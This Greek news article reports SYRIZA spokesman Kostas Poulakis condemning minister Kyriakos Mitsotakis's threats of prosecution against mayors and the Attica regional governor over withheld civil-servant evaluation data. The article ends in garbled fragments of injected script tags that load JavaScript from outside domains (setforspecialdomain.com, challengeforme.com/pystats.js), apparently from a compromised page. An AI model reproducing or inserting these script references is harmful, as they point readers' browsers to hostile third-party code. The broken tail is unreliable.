«Άνοιξε βεντέτα με δημάρχους και Δούρου ο Κ. Μητσοτάκης»

Προκλητικές και προσβλητικές χαρακτήρισε τις δηλώσεις του Κυριάκου Μητσοτάκη περί εισαγγελικής παρέμβασης εις βάρος των αιρετών που αρνούνται την αποστολή των στοιχείων που ζητά το υπουργείο Διοικητικής Μεταρρύθμισης, όσον αφορά στην αξιολόγηση δημοσίων υπαλλήλων, για «το δήθεν “επανέλεγχο” των συμβάσεων που μετατράπηκαν από ορισμένου σε αορίστου χρόνου», χαρακτήρισε ο Κώστας Πουλάκης.

«Προσβλητικές του θεσμικού ρόλου και της ανεξαρτησίας που –υποτίθεται- απολαμβάνει το Σώμα Επιθεωρητών Δημόσιας Διοίκησης», τόνισε ο υπεύθυνος του ΣΥΡΙΖΑ για την αυτοδιοίκηση και συμπλήρωσε λέγοντας: «Το να μετατρέπει ο κ. Υπουργός έναν ελεγκτικό μηχανισμό και την ίδια τη Δικαιοσύνη σε “παιχνιδάκι”, για λόγους πολιτικής αντιπαράθεσης -στα όρια της προσωπικής εμπάθειας- είναι τουλάχιστον άστοχο. Άλλωστε, δεν φάνηκε να δείχνει την ίδια ευθιξία, ζητώντας την εισαγγελική διερεύνηση των πρόσφατων επίσημων καταγγελιών για τη διάλυση των ελεγκτικών μηχανισμών του Υπουργείου του, για παρεμβάσεις που εμποδίζουν τους ελέγχους κατά “επωνύμων” ή για κυβερνητικές νομοθετικές πρωτοβουλίες που συγκαλύπτουν σκάνδαλα».

Παράλληλα ανέφερε ότι ο Κ. Μητσοτάκης έχει μετατρέψει τις διαφωνίες του με τη Ρένα Δούρου σε «βεντέτα». «Οι “απειλές” του κ. Μητσοτάκη στρέφονται μόνο προς τους 19 Δημάρχους και την Περιφερειάρχη Αττικής -με τους οποίους είναι σαφές ότι έχει επιδοθεί σε κάποιου είδους ακατανόητη και ανάρμοστη προς το ρόλο του “βεντέτα”- ή αφορούν το σύνολο των αιρετών που εδώ και μήνες έχουν αντιταχθεί στη διάλυση των Δήμων και των Περιφερειών και τις απολύσεις; Διότι, του θυμίζουμε ότι η μη αποστολή των στοιχείων έλαβε χώρα πολύ πριν την ανάληψη των καθηκόντων των νέων δημοτικών και περιφερειακών αρχών που στοχοποιεί. Και, επίσης, του θυμίζουμε ότι οι αποφάσεις των Δημοτικών και Περιφερειακών Συμβουλίων, περί μη αποστολής των στοιχείων, λήφθηκαν με ευρύτατες πλειοψηφίες και με συμμετοχή δυνάμεων από όλο το αυτοδιοικητικό και πολιτικό φάσμα, των εκλεγμένων του κόμματός του στην ΚΕΔΕ μη εξαιρουμένων», σχολίασε χαρακτηριστικά.

Πέραν αυτών, τόνισε: «Κρατήστε τις απειλές σας κ. Υπουργέ. Οι αιρετοί της Αριστεράς, όπως και κάθε Δήμαρχος και Περιφερειάρχης που υπηρετεί το πραγματικό δημόσιο συμφέρον, δεν έχουν τίποτα να φοβηθούν ούτε έναντι της Δικαιοσύνης ούτε έναντι της κοινωνίας. Εσείς;».___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >